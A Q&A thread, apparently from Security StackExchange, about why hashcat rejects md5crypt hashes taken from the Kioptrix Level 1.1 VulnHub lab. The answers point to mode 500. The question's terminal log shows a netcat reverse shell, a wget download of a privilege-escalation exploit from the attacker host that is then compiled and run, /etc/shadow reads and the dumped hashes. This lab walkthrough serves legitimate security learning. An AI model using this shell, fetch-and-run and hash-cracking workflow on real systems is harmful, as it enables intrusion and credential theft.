I have been trying Kioptrix: Level 1.1 (#2) and managed to get root access. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
wolf@linux:~$ nc -vklp 8080
listening on [any] 8080 ...
10.10.10.10: inverse host lookup failed: Unknown host
connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795
id
uid=48(apache) gid=48(apache) groups=48(apache)
cd /tmp
wget http://10.10.10.99/privesc.c
ls
privesc.c
gcc privesc.c -o privesc
./privesc
id
uid=0(root) gid=0(root) groups=48(apache)
cat /etc/passwd
cat /etc/shadow
Unshadowed file = md5.txt
wolf@linux:~$ cat md5.txt
root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash
john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash
harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash
wolf@linux:~$
However, I ran into problems when feeding the unshadowed file md5.txt to hashcat.
Any idea what's going on here?
wolf@linux:~$ hashcat -m 0 -a 0 md5.txt rockyou.txt
hashcat (v4.0.1) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation
======================================
Hashfile 'md5.txt' on line 1 (root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 2 (john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception
Hashfile 'md5.txt' on line 3 (harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.
Started: Mon May 25 01:17:21 2020
Stopped: Mon May 25 01:17:21 2020
wolf@linux:~$
Update
I also tried using only the md5 hashes instead of the unshadowed file, but it still didn't work.
md5 hashes only
wolf@linux:~$ cat md5only.txt
$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.
$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1
$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1
wolf@linux:~$
Still getting the same Line-length exception, (0.00%)...No hashes loaded error.
wolf@linux:~$ hashcat -m 0 -a 0 md5only.txt rockyou.txt
hashcat (v4.0.1) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation
======================================
Hashfile 'md5only.txt' on line 1 ($1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.): Line-length exception
Hashfile 'md5only.txt' on line 2 ($1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1): Line-length exception
Hashfile 'md5only.txt' on line 3 ($1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1): Line-length exception
Parsing Hashes: 0/3 (0.00%)...No hashes loaded.
Started: Mon May 25 03:10:03 2020
Stopped: Mon May 25 03:10:03 2020
wolf@linux:~$
Posted on 2020-05-25 00:11:28
What version of hashcat do you have?
kali@kali:$ hashcat --version
v5.1.0
kali@kali:$
There are several types of md5 supported by hashcat
kali@kali:$ hashcat -h | grep md5
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated
4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated
4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated
3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash, Salted and/or Iterated
4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated
4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | HTTP, SMTP, LDAP Server
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating Systems
6300 | AIX {smd5} | Operating Systems
kali@kali:$
If you check the hash with hashid, you will find that this is actually MD5 Crypt
kali@kali:$ hashid '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
Analyzing '$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.'
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5
kali@kali:$
There is only one md5crypt, and its code is 500.
kali@kali:$ hashcat -h | grep md5.*cry
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating Systems
kali@kali:$
Try again with the correct hash mode, which is 500 in this case.
Try again. Voila
kali@kali:~$ hashcat -m 500 -a 0 md5crypt.txt rockyou.txt
hashcat (v4.0.1) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation
======================================
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger disabled.
* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=32 -D CUDA_ARCH=601 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=500 -D _unroll'
* Device #1: Kernel m00500.c2bb92e8.kernel not found in cache! Building may take a while...
* Device #1: Kernel amp_a0.e98c1de0.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs
- Device #1: autotuned kernel-accel to 128
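- Device #1: autotuned kernel-loops to 250
Posted on 2020-05-24 18:23:40
Unlike John the Ripper, Hashcat doesn't understand the password file format; it only needs the hashes. So, for example, to crack the root password, just feed Hashcat the following: $1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.
EDIT: I overlooked the options you used. These are not plain MD5 hashes; regular hashes can only be hex characters. Before running Hashcat, match the hashes against their table to determine the correct type. In this case, they look like md5crypt, so the correct option is -m 500.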
https://security.stackexchange.com/questions/232135
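
Added example, not part of the original question or answers: Python that pulls the hash field out of an unshadow-style line and maps its prefix to a hashcat mode, which shows why `-m 0` (32 hex characters only) rejected the `$1$` lines. The function names and the sample list are assumptions made for this example; modes 500 and 1600 come from the `hashcat -h` listing above, while 7400 and 1800 are added from hashcat's mode list.

```python
import re

# Crypt-style prefix -> (scheme, hashcat -m mode). 500 and 1600 are in the
# hashcat -h listing quoted on this page; 7400 and 1800 are added here.
PREFIX_MODES = [
    ("$1$", "md5crypt", 500),
    ("$apr1$", "Apache apr1 MD5", 1600),
    ("$5$", "sha256crypt", 7400),
    ("$6$", "sha512crypt", 1800),
]
RAW_MD5 = re.compile(r"[0-9a-fA-F]{32}")  # the only shape -m 0 accepts

# Sample input: the first line is from the question's md5.txt, the rest are
# constructed for this example.
SAMPLE = [
    "root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash",
    "daemon:*:2:2:daemon:/sbin:/sbin/nologin",   # locked account
    "d41d8cd98f00b204e9800998ecf8427e",          # MD5 of the empty string
]


def parse(line):
    """Split a bare hash or a user:hash:uid:... line into (user, hash)."""
    line = line.strip()
    if ":" in line and not line.startswith("$"):
        user, field = line.split(":")[:2]
        return user, field
    return None, line


def classify(field):
    """Return (scheme, hashcat mode); mode is None if nothing applies."""
    if field in ("", "*", "x") or field.startswith("!"):
        return "no hash present", None
    for prefix, scheme, mode in PREFIX_MODES:
        if field.startswith(prefix):
            return scheme, mode
    if RAW_MD5.fullmatch(field):
        return "raw MD5", 0
    return "unknown", None


def report(lines):
    """One (user, scheme, mode) tuple per input line."""
    return [(user, *classify(field)) for user, field in map(parse, lines)]


if __name__ == "__main__":
    for row in report(SAMPLE):
        print(row)
```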